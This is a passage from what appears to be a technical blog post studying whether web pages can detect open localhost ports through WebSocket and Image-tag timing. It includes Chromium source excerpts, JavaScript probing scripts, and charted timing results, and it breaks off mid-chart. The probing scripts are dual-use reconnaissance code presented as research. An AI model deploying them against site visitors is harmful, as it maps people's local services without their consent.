<div class="highlight"><pre><span></span><code>python -m http.server --bind <span class="m">127</span>.0.0.1 <span class="m">8888</span>
</code></pre></div>
<p>The I launched the browser, navigated to <code>incolumitas.com</code> and pasted the above script into the console.</p>
<p>After repeating this step 10 times (open browser, navigate to site, paste code and take time measurement, close browser), I got the following timeouts:</p>
<div class="highlight"><pre><span></span><code><span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">13.179999999920256</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">9.160000000520085</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">17.110000000684522</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">7.840000000214786</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">8.205000000089058</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">15.51000000017666</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">7.150000000365253</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">13.845000000401342</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">17.30500000030588</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">9.01499999963562</span><span class="w"></span>
</code></pre></div>
<p>And then I did the same process with the port 8889, where no service is running. I got the following timeouts after 10 runs:</p>
<div class="highlight"><pre><span></span><code><span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">7.255000000441214</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">5.694999999832362</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">8.78999999986263</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">6.68500000028871</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">11.080000000220025</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">6.844999999884749</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">8.659999999508727</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">7.13999999970838</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">8.420000000114669</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">5.494999999427819</span><span class="w"></span>
</code></pre></div>
<p>There is a slight difference in timings, but it's not a vast difference. Based on timing, you cannot really distinguish whether a port is open or not.</p>
<p>But why did I do this process manually? Why did I restart the browser after each measurement taken?</p>
<p>The reason is, that Chromium makes it very hard to determine whether a port is open or closed by considering time measurements.</p>
<p>Furthermore, once a socket is created for a <code>(host, port)</code> pair, this socket is shared among normal HTTP connections. The document <a href="(https://docs.google.com/document/d/1a8sUFQsbN5uve7ziW61ATkrFr3o9A-Tiyw8ig6T3puA/edit#)">"WebSocket Throttling Design"</a> states:</p>
<blockquote>
<p>The new WebSocket stack re-uses the HTTP stack for its handshake.</p>
</blockquote>
<p>and </p>
<blockquote>
<p>The major issue with this design as it stands is that proxy connections for WebSockets share the ConnectionPoolManager with direct connections.</p>
</blockquote>
<h3>A Dive into the Chromium WebSocket Source Code</h3>
<p>For example, you can look into the <a href="https://chromium.googlesource.com/chromium/src/+/master/net/websockets/websocket_stream.cc">Chrome WebSocket source code</a>:</p>
<p>Those are interesting sections in the file <code>websocket_stream.cc</code>. There a timeout interval variable is defined. The mechanism is intended <em>to make it hard for JavaScript programs to recognize the timeout cause</em>.</p>
<div class="highlight"><pre><span></span><code><span class="c1">// The timeout duration of WebSocket handshake.</span>
<span class="c1">// It is defined as the same value as the TCP connection timeout value in</span>
<span class="c1">// net/socket/websocket_transport_client_socket_pool.cc to make it hard for</span>
<span class="c1">// JavaScript programs to recognize the timeout cause.</span>
<span class="k">const</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">kHandshakeTimeoutIntervalInSeconds</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">240</span><span class="p">;</span><span class="w"></span>
</code></pre></div>
<p>This is the <code>Start()</code> method that starts a WebSocket connection.</p>
<div class="highlight"><pre><span></span><code><span class="kt">void</span><span class="w"> </span><span class="nf">Start</span><span class="p">(</span><span class="n">std</span><span class="o">::</span><span class="n">unique_ptr</span><span class="o"><</span><span class="n">base</span><span class="o">::</span><span class="n">OneShotTimer</span><span class="o">></span><span class="w"> </span><span class="n">timer</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">DCHECK</span><span class="p">(</span><span class="n">timer</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">base</span><span class="o">::</span><span class="n">TimeDelta</span><span class="w"> </span><span class="n">timeout</span><span class="p">(</span><span class="n">base</span><span class="o">::</span><span class="n">TimeDelta</span><span class="o">::</span><span class="n">FromSeconds</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">kHandshakeTimeoutIntervalInSeconds</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">timer_</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">std</span><span class="o">::</span><span class="n">move</span><span class="p">(</span><span class="n">timer</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">timer_</span><span class="o">-></span><span class="n">Start</span><span class="p">(</span><span class="n">FROM_HERE</span><span class="p">,</span><span class="w"> </span><span class="n">timeout</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">base</span><span class="o">::</span><span class="n">BindOnce</span><span class="p">(</span><span class="o">&</span><span class="n">WebSocketStreamRequestImpl</span><span class="o">::</span><span class="n">OnTimeout</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">base</span><span class="o">::</span><span class="n">Unretained</span><span class="p">(</span><span class="k">this</span><span class="p">)));</span><span class="w"></span>
<span class="w"> </span><span class="n">url_request_</span><span class="o">-></span><span class="n">Start</span><span class="p">();</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>So what kind of timer is in the variable <code>timer_</code> ? </p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="c1">// A timer for handshake timeout.</span>
<span class="w"> </span><span class="n">std</span><span class="o">::</span><span class="n">unique_ptr</span><span class="o"><</span><span class="n">base</span><span class="o">::</span><span class="n">OneShotTimer</span><span class="o">></span><span class="w"> </span><span class="n">timer_</span><span class="p">;</span><span class="w"></span>
</code></pre></div>
<p>A brief look into <a href="https://chromium.googlesource.com/chromium/src/+/master/base/timer/timer.h">/master/base/timer/timer.h</a> reveals what this timer does: </p>
<blockquote>
<p>As the names suggest, OneShotTimer calls you back once after a time delay expires.</p>
</blockquote>
<p>Therefore, this timer is used to fire when a timeout occurs in the WebSocket connection.</p>
<p>Then, we have a look into <a href="https://github.com/chromium/chromium/blob/master/net/socket/websocket_transport_client_socket_pool.cc">websocket_transport_client_socket_pool.cc</a> and we see the method </p>
<div class="highlight"><pre><span></span><code><span class="kt">void</span><span class="w"> </span><span class="nf">WebSocketTransportClientSocketPool::InvokeUserCallbackLater</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">ClientSocketHandle</span><span class="o">*</span><span class="w"> </span><span class="n">handle</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">CompletionOnceCallback</span><span class="w"> </span><span class="n">callback</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">rv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">DCHECK</span><span class="p">(</span><span class="o">!</span><span class="n">pending_callbacks_</span><span class="p">.</span><span class="n">count</span><span class="p">(</span><span class="n">handle</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">pending_callbacks_</span><span class="p">.</span><span class="n">insert</span><span class="p">(</span><span class="n">handle</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">base</span><span class="o">::</span><span class="n">ThreadTaskRunnerHandle</span><span class="o">::</span><span class="n">Get</span><span class="p">()</span><span class="o">-></span><span class="n">PostTask</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">FROM_HERE</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">base</span><span class="o">::</span><span class="n">BindOnce</span><span class="p">(</span><span class="o">&</span><span class="n">WebSocketTransportClientSocketPool</span><span class="o">::</span><span class="n">InvokeUserCallback</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">weak_factory_</span><span class="p">.</span><span class="n">GetWeakPtr</span><span class="p">(),</span><span class="w"> </span><span class="n">handle</span><span class="p">,</span><span class="w"> </span><span class="n">std</span><span class="o">::</span><span class="n">move</span><span class="p">(</span><span class="n">callback</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="n">rv</span><span class="p">));</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>The method <code>InvokeUserCallbackLater()</code> is invoked in all the cases:</p>
<ul>
<li>When a WebSocket connection is successful</li>
<li>when a WebSocket connection failed because the port is closed</li>
<li>when a WebSocket connection failed because the service does not speak the same protocol...</li>
</ul>
<h4>Top Down Approach</h4>
<p>However, we are interested in the logic that aborts the control flow when the connection could not be established. </p>
<p>Put differently, where does the chrome source code decide that on this port is not running a valid web socket service?</p>
<p>So we have to scan the chrome <a href="https://github.com/chromium/chromium/tree/master/net/websockets">WebSocket source code</a> for the generation of this error message: <code>Error during WebSocket handshake: Unexpected response code: 404</code>.</p>
<p>After a quick search in the <a href="https://github.com/chromium/chromium/">GitHub chrome source code mirror</a>, we find the location to be in the file <a href="">websocket_basic_handshake_stream.cc</a> on line 464:</p>
<div class="highlight"><pre><span></span><code><span class="k">switch</span><span class="w"> </span><span class="p">(</span><span class="n">response_code</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="nl">HTTP_SWITCHING_PROTOCOLS</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">ValidateUpgradeResponse</span><span class="p">(</span><span class="n">headers</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="c1">// We need to pass these through for authentication to work.</span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="nl">HTTP_UNAUTHORIZED</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="nl">HTTP_PROXY_AUTHENTICATION_REQUIRED</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">OK</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="c1">// Other status codes are potentially risky (see the warnings in the</span>
<span class="w"> </span><span class="c1">// WHATWG WebSocket API spec) and so are dropped by default.</span>
<span class="w"> </span><span class="k">default</span><span class="o">:</span><span class="w"></span>
<span class="w"> </span><span class="c1">// A WebSocket server cannot be using HTTP/0.9, so if we see version</span>
<span class="w"> </span><span class="c1">// 0.9, it means the response was garbage.</span>
<span class="w"> </span><span class="c1">// Reporting "Unexpected response code: 200" in this case is not</span>
<span class="w"> </span><span class="c1">// helpful, so use a different error message.</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">headers</span><span class="o">-></span><span class="n">GetHttpVersion</span><span class="p">()</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">HttpVersion</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">9</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">OnFailure</span><span class="p">(</span><span class="s">"Error during WebSocket handshake: Invalid status line"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">ERR_FAILED</span><span class="p">,</span><span class="w"> </span><span class="n">base</span><span class="o">::</span><span class="n">nullopt</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">OnFailure</span><span class="p">(</span><span class="n">base</span><span class="o">::</span><span class="n">StringPrintf</span><span class="p">(</span><span class="s">"Error during WebSocket handshake: "</span><span class="w"></span>
<span class="w"> </span><span class="s">"Unexpected response code: %d"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">headers</span><span class="o">-></span><span class="n">response_code</span><span class="p">()),</span><span class="w"></span>
<span class="w"> </span><span class="n">ERR_FAILED</span><span class="p">,</span><span class="w"> </span><span class="n">headers</span><span class="o">-></span><span class="n">response_code</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">result_</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">HandshakeResult</span><span class="o">::</span><span class="n">INVALID_STATUS</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">ERR_INVALID_RESPONSE</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>The method <code>OnFailure()</code> is called, which is defined in the file <a href="https://chromium.googlesource.com/chromium/src/+/master/net/websockets/websocket_stream.cc">websocket_stream.cc</a> on line 151:</p>
<div class="highlight"><pre><span></span><code><span class="kt">void</span><span class="w"> </span><span class="nf">OnFailure</span><span class="p">(</span><span class="k">const</span><span class="w"> </span><span class="n">std</span><span class="o">::</span><span class="n">string</span><span class="o">&</span><span class="w"> </span><span class="n">message</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">net_error</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">base</span><span class="o">::</span><span class="n">Optional</span><span class="o"><</span><span class="kt">int</span><span class="o">></span><span class="w"> </span><span class="n">response_code</span><span class="p">)</span><span class="w"> </span><span class="k">override</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">api_delegate_</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">api_delegate_</span><span class="o">-></span><span class="n">OnFailure</span><span class="p">(</span><span class="n">message</span><span class="p">,</span><span class="w"> </span><span class="n">net_error</span><span class="p">,</span><span class="w"> </span><span class="n">response_code</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">failure_message_</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">message</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">failure_net_error_</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">net_error</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">failure_response_code_</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">response_code</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>It does not look like the method <code>OnFailure()</code> is delayed or fired with a timer. Therefore, it should be possible to notify timing differences.</p>
<h3>Statistically significant Tests</h3>
<p>Well, now we have learned the following two things:</p>
<ul>
<li>When we reuse sockets in Chromium, we will get skewed results. It is mandatory to either restart the browser, or at least close the socket with <code>ws.close()</code>.</li>
<li><code>OnFailure()</code> is not artificially delayed. Therefore, there should be slight differences in timing when making a WebSocket connection to a closed port compared to a open port.</li>
</ul>
<p>The following program attempts to connect <code>N = 30</code> times to a open port and 30 times to a (likely) closed port.</p>
<p>After each attempt, the socket is closed, before a new connection is made.</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">timePort</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">port</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span>
<span class="c1">// a random appendix to the URL to prevent caching</span>
<span class="kd">var</span> <span class="nx">random</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">().</span><span class="nx">toString</span><span class="p">().</span><span class="nx">replace</span><span class="p">(</span><span class="s1">'0.'</span><span class="p">,</span> <span class="s1">''</span><span class="p">).</span><span class="nx">slice</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="mf">7</span><span class="p">)</span>
<span class="kd">var</span> <span class="nx">ws</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s2">"ws://127.0.0.1:"</span> <span class="o">+</span> <span class="nx">port</span> <span class="o">+</span> <span class="s1">'/'</span> <span class="o">+</span> <span class="nx">random</span><span class="p">)</span>
<span class="nx">ws</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">)</span>
<span class="c1">// close the socket before we return</span>
<span class="nx">ws</span><span class="p">.</span><span class="nx">close</span><span class="p">()</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nb">parseFloat</span><span class="p">(</span><span class="nx">elapsed</span><span class="p">.</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">3</span><span class="p">)))</span>
<span class="p">}</span>
<span class="p">})</span>
<span class="p">}</span>
<span class="kd">const</span> <span class="nx">port</span> <span class="o">=</span> <span class="mf">8888</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">N</span> <span class="o">=</span> <span class="mf">30</span><span class="p">;</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">timings</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">N</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">timings</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="k">await</span> <span class="nx">timePort</span><span class="p">(</span><span class="nx">port</span><span class="p">))</span>
<span class="p">}</span>
<span class="nx">timings</span><span class="p">.</span><span class="nx">sort</span><span class="p">((</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">=></span> <span class="nx">a</span> <span class="o">-</span> <span class="nx">b</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">timings</span><span class="p">)</span>
<span class="p">})();</span>
</code></pre></div>
<p>The response times are plotted in a histogram, to visually show that there is a significant difference in response times. I used <code>chart.js</code>.
The scale is logarithmic. It is very easy to spot that heavy throttling takes place.</p>
<script src="https://cdn.jsdelivr.net/npm/chart.js@2.8.0"></script>
<canvas id="chartJSContainer" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
datasets: [
{
label: 'Open Port Timings',
data: [11.345, 11.525, 11.555, 11.77, 12.11, 12.86, 13.84, 16.055, 38.735, 43.125, 75.77, 91.45, 535.255, 940.86, 1100.415, 1568.03, 1702.405, 1768.775, 1866.21, 2055.645, 2437.4, 2690.86, 3011.965, 3118.07, 3157.795, 3471.12, 4395.175, 4439.105, 4596.1, 4986.875],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Closed Port Timings',
data: [7.86, 10.035, 10.135, 10.275, 10.42, 10.74, 11.45, 17.12, 23.925, 25.935, 80.505, 212.785, 376.305, 663.645, 961.385, 1093.705, 1659.905, 1734.135, 2137.24, 3128.94, 3190.47, 3231.12, 3257.18, 3812.22, 3993.54, 4244.75, 4251.375, 4472.14, 4707.59, 4746.89],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
type: 'logarithmic',
ticks: {
reverse: false
}
}]
}
}
}
var ctx = document.getElementById('chartJSContainer').getContext('2d');
new Chart(ctx, options);
</script>
<p>This is very weird and inconsistent behavior. It seems like there is only a consistent pattern in the first 7 requests, then the open/closed property doesn't seem to correlate anymore.</p>
<p>And then I did the same for the Firefox browser (but only with 12 measurements, because throttling kicks in and the delays are becoming large):</p>
<canvas id="chartFirefox" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11],
datasets: [
{
label: 'Firefox: Open Port Timings',
data: [ 48, 334, 501, 752, 1165, 1601, 2447, 3659, 5481, 8211, 12318, 18464],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Firefox: Closed Port Timings',
data: [ 34, 368, 551, 817, 1215, 1820, 2719, 4071, 6102, 9644, 13714, 20561],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
type: 'logarithmic',
ticks: {
reverse: false
}
}]
}
}
}
var ctx = document.getElementById('chartFirefox').getContext('2d');
new Chart(ctx, options);
</script>
<p>What we see here, is that closed ports seem to be taking more time than open ports. </p>
<p><a href="https://datatracker.ietf.org/meeting/96/materials/slides-96-saag-1/">Those slides</a> explain exactly what counter measures are employed against browser based port scanning. There is definitely throttling happening here.</p>
<h3>Statistics with Image Tags</h3>
<p>Port scanning can also be attempted by making requests with Image tags. This is the test that I used:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">timePortImage</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">port</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span>
<span class="c1">// a random appendix to the URL to prevent caching</span>
<span class="kd">var</span> <span class="nx">random</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">().</span><span class="nx">toString</span><span class="p">().</span><span class="nx">replace</span><span class="p">(</span><span class="s1">'0.'</span><span class="p">,</span> <span class="s1">''</span><span class="p">).</span><span class="nx">slice</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="mf">7</span><span class="p">)</span>
<span class="kd">var</span> <span class="nx">img</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Image</span><span class="p">;</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">)</span>
<span class="c1">// close the socket before we return</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nb">parseFloat</span><span class="p">(</span><span class="nx">elapsed</span><span class="p">.</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">3</span><span class="p">)))</span>
<span class="p">}</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="s2">"http://127.0.0.1:"</span> <span class="o">+</span> <span class="nx">port</span> <span class="o">+</span> <span class="s1">'/'</span> <span class="o">+</span> <span class="nx">random</span> <span class="o">+</span> <span class="s1">'.png'</span>
<span class="p">})</span>
<span class="p">}</span>
<span class="kd">const</span> <span class="nx">portOpen</span> <span class="o">=</span> <span class="mf">8888</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">portClosed</span> <span class="o">=</span> <span class="mf">9657</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">N</span> <span class="o">=</span> <span class="mf">30</span><span class="p">;</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">timingsOpen</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">var</span> <span class="nx">timingsClosed</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">N</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">timingsOpen</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="k">await</span> <span class="nx">timePortImage</span><span class="p">(</span><span class="nx">portOpen</span><span class="p">))</span>
<span class="nx">timingsClosed</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="k">await</span> <span class="nx">timePortImage</span><span class="p">(</span><span class="nx">portClosed</span><span class="p">))</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">timingsOpen</span><span class="p">))</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">timingsClosed</span><span class="p">))</span>
<span class="p">})();</span>
</code></pre></div>
<p>Port scanning with Image tags on Chrome with <code>N=20</code> and service <code>python -m http.server --bind localhost 8888</code>.</p>
<canvas id="chromeImage" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19],
datasets: [
{
label: 'Open Port Timings',
data: [14.095,7.125,8.28,6.8,7.2,20.73,8.78,9.685,10.2,6.895,8.265,7.17,7.17,9.405,27.39,8.255,16.39,6.69,12.01,7.56],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Closed Port Timings',
data: [5.065,5.235,3.59,3.72,4.775,7.215,11.62,6.74,3.785,3.81,7.875,3.725,5.33,4.325,5.765,3.785,3.865,4.42,3.675,3.44],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
ticks: {
reverse: false
}
}]
}
}
}
var ctx = document.getElementById('chromeImage').getContext('2d');
new Chart(ctx, options);
</script>
<p>Another sample of port scanning with Image tags on Chrome with <code>N=30</code> with a different HTTP server.</p>
<canvas id="chromeImage2" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
datasets: [
{
label: 'Open Port Timings',
data: [5.75,4.705,4.6,4.905,4.23,4.155,4.13,8.07,6.185,5.46,4.095,4.695,4.01,7.535,3.745,4.27,4.305,4.43,4.475,4.185,4.035,4.14,3.85,4.11,3.985,4.035,4.02,3.885,4,3.895],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Closed Port Timings',
data: [4.73,3.455,2.78,3.495,3.095,2.785,2.885,6.165,2.75,2.755,4.29,2.905,2.82,24.025,2.705,3.55,2.735,2.68,2.81,3.13,2.89,3.06,2.825,3.44,2.575,2.8,3.07,3.18,4.005,2.845],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
ticks: {
reverse: false
}
}]
}
}
}
var ctx = document.getElementById('chromeImage2').getContext('2d');
new Chart(ctx, options);
</script>
<p>And a third example of port scanning with Image tags on Chrome with <code>N=30</code> with <code>nginx</code> running as a service on <code>localhost:3333</code>.</p>
<canvas id="chromeImageNginx" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
datasets: [
{
label: 'Open Port Timings',
data: [9.69,5.635,6.295,5.76,6.235,6.49,13.84,6.815,7.58,5.13,7.47,6.135,5.83,7.015,10.5,12.74,7.24,4.795,4.47,7.07,4.075,4.285,17.995,4.865,5.075,4.48,4.52,4.68,4.585,6.03],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Closed Port Timings',
data: [5.785,5.445,3.725,4.795,3.69,11.235,4.315,3.59,7.745,3.31,2.89,3.83,3.345,3.625,5.955,3.91,4.68,2.91,2.805,4.545,3.145,7.875,3.905,4.4,2.83,2.965,3.125,2.89,17.82,3.68],
borderWidth: 1,
